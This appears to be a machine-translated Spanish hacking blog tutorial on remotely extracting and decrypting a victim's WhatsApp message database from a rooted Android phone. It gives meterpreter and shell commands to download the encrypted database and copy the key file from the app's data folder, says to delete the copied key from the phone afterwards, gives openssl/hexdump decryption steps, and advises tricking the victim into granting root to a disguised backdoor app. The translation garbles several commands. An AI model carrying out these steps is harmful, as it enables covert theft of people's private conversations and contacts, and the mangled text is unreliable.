BlogWonderHowTo

Cómo: piratear y descifrar la base de datos de WhatsApp (de forma remota) [ROOT]

Hola mis compañeros hackers, ha pasado un tiempo desde mi última publicación, no puedo tener tiempo para las publicaciones hoy en día, pero puedo atender a los comentarios.

Bienvenido a mi novena publicación, este tutorial explicará cómo extraer y descifrar la base de datos de WhatsApp del sistema Android de la víctima.

Si el dispositivo debe estar enraizado, no hay forma de hacer esto de forma remota. He estado recibiendo PM sobre esto y no puedo simplemente responder con la palabra PARODIA.

WhatsApp

Casi todo el mundo lo sabe. Es una aplicación social para Android que permite al usuario enviar mensajes gratuitos a través de Internet en segundos. Los desarrolladores han tenido un gran éxito y tienen algoritmos complejos y de alto nivel para cifrar y almacenar los datos, ¡que cambia con cada actualización! Y, por lo tanto, todos lo usan para enviar incluso la mayoría de los mensajes del personal porque saben que es seguro.

Pero es ?

Sí, en realidad es muy seguro, sin embargo, si la víctima es un tonto o crédulo, él / ella es la principal vulnerabilidad aquí. Veo que muchos de los ‘usuarios experimentados’ rootean su Android para explorar / empujar a los límites máximos del sistema. Siguiendo sus pasos, los ‘usuarios sin experiencia’ también rootean / bloquean su Android solo para realizar una tarea menor. Ni siquiera se preocupan por los contras.

De todos modos, ejecutemos el truco:

Paso 1: ¡Aproveche y obtenga acceso a Android!

Esta es la parte fácil que a todos les gusta y a la que están acostumbrados.

Siga esta guía para obtener acceso al Android rooteado.

Una vez en el indicador de meterpreter, escriba check_root para asegurarse de que el dispositivo esté rooteado.

¿Qué Requerimos?

Para descifrar la base de datos, obviamente necesitamos la base de datos en sí y un archivo clave en la carpeta / data, para lo cual necesitamos root para acceder a la ubicación. Nosotros no puedo descifrar la base de datos sin la clave (¡hasta que quiera pasar más de 100 años incluso con un mainframe!)

Paso 2: Comencemos el proceso de extracción de la base de datos:

En tipo meterpreter:

  • CD /
  • cd / sdcard / WhatsApp
  • ls (Imprime el directorio actual)
  • bases de datos cd
  • descargar msgstore.db.crypt8 (Esto llevará tiempo, tal vez MUCHO)

Entonces, la base de datos se ha descargado, ahora necesitamos ‘Clave de descifrado’
(El archivo de claves que contiene las claves de cifrado ya no se puede recuperar a menos que su teléfono esté rooteado)

Paso 3: caiga en el caparazón:

Como dije antes, pero agregando un poco mas detalle aquí:

Para descifrar el crypt8 archivos, necesitaremos el archivo clave. El archivo de claves almacena dos conjuntos de claves de descifrado – la clave de cifrado real,K y un vector de inicialización llamado IV . WhatsApp almacena el archivo de clave en un ubicación segura.

Extrayendo el archivo de clave, tipo:

  • cáscara
  • su (Para acceso de superusuario o simplemente privilegios de escalada)

Aquí viene la parte complicada, si el objetivo es experimentado y habilidoso, debe haber instalado el SuperSU solicitud.

La aplicación es responsable de mantener los permisos si qué aplicación puede tener acceso a la raíz. Incluso contiene todos los registros.

Por lo tanto, debemos convencer a la víctima de que la aplicación es para impulsar (o cualquier otra razón) su sistema Android, pero al mismo tiempo requiere acceso de root para alcanzar su máximo potencial. Aquí hay un excelente tutorial por bart que muestra cómo disfrazar una aplicación de puerta trasera.

(————— “Víctima, abre SuperSU y da permiso” —————)

Hay algunos casos con usuarios inexpertos y no calificados:

  • No tienen una aplicación SuperSU instalada.
  • No han cambiado la configuración de las aplicaciones recién instaladas a INMEDIATO en vez de CONCEDER.

¡Así que en estos casos tenemos mucha suerte!

Continuemos:
(Si el Android no está rooteado, puede navegar, pero no copiar ni imprimir el directorio)

  • CD /
  • cd / datos / datos
  • ls
  • cd com.whatsapp
  • ls
  • archivos cd
  • ls
  • cp key / sdcard / Descargar

(Significa copiar el archivo ‘clave’ a sdcard> carpeta de descarga)

Terminar el caparazón:
^ C (Control + C)

¡La clave se ha extraído de / data a / sdcard con éxito!

Paso 4: De nuevo a Meterpreter:

Descarguemos el archivo de clave extraído a nuestro directorio raíz como hicimos para la base de datos cifrada, escriba:

  • CD /
  • cd / sdcard / Descargar
  • descargar clave
  • clave rm (Asegúrese de hacer eso para eliminar el archivo de clave)

¡La clave se ha extraído a nuestro directorio raíz con éxito!

Paso 5: ¡DESCRIPTA LA BASE DE DATOS!

Ahora que tenemos el base de datos y la clave, podemos descifrarlo fácilmente con uno de los dos métodos:

# 1 con comandos simples de Linux:

Con las dos necesidades en el directorio raíz, abra una terminal y escriba:
(Copie y pegue los comandos uno a la vez, no hagas aa texto fuera de eso, o eso no trabajará)

  • hexdump -e ‘2/1 “% 02x”‘ clave | cortar -b 253-316> aes.txt
  • hexdump -n 67 -e ‘2/1 “% 02x”‘ msgstore.db.crypt8 | cortar -b 103-134> iv.txt
  • dd if = msgstore.db.crypt8 of = msgstore.db.crypt8.nohdr ibs = 67 skip = 1
  • openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K $ (cat aes.txt) -iv $ (cat iv.txt)> msgstore.gz
  • gzip -cdq msgstore.gz> msgstore.db

Si haces un pequeño golpe, entonces puedes entender fácilmente estos comandos. (Fuente: aquí)

Si el cuarto comando no funciona, siga:

  • hexdump -e ‘2/1 “% 02x”‘ clave | corte -b 253-316

(Copie el texto impreso)

  • hexdump -n 67 -e ‘2/1 “% 02x”‘ msgstore.db.crypt8 | corte -b 103-134

(Copie el texto impreso)

  • openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K (Pegar texto del primer comando) -iv (Pegar texto del segundo comando) > msgstore.gz

Estos comandos tienen errores / errores en el resultado, por lo que recomendaría encarecidamente optar por el método n. ° 2.

# 2 con la aplicación de visor de WhatsApp de Windows simple:

La aplicación tiene una excelente interfaz, desde GitHub . Descarga la aplicación desde allí.

Además, copie la clave y la base de datos en Windows, espero que sepa cómo hacerlo.

  • Abra la aplicación (en Windows, por supuesto).
  • Haga clic en Archivo, luego en ‘Descifrar .crypt8’
  • En el cuadro de diálogo que aparece, proporcione el archivo de clave y la base de datos.
  • Haga clic en Aceptar, verá que ha aparecido un archivo ‘msgstore.decrypted’ en su escritorio.
  • Ábralo usando la misma aplicación, vaya a ‘Archivo’ y luego a ‘Abrir’.
  • Proporcione el archivo descifrado, deje el nombre de la cuenta en blanco y para el ‘wa.db’, puede piratear el teléfono nuevamente para extraer este .db, para resolver los nombres de los contactos como se menciona en la captura de pantalla recortada a continuación.

Y ‘Auge’ todos los contactos con todos los chats incluso los últimos espera tu clic

El tutorial termina:

Ahora que sabes lo peligroso Enraizamiento en realidad lo es, por favor, ten cuidado.

Un cracker no solo puede realizar esto truco simple, incluso puede extraer todas las contraseñas de Wi-Fi almacenadas en tu Android, ¡puede acceder a todo, cosas a las que incluso tú no tienes acceso! El puede difundir a tu PC una vez que conectes tu Android, hackear tus cuentas (contraseñas guardadas) y incluso marco tú. Te conviertes en un mero peón a sus planes futuros.

Entonces, pensar dos veces antes de rootear y tenga mucho cuidado, mientras sostiene un androide rooteado en sus manos.

¡Gracias!
F.3.AR

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar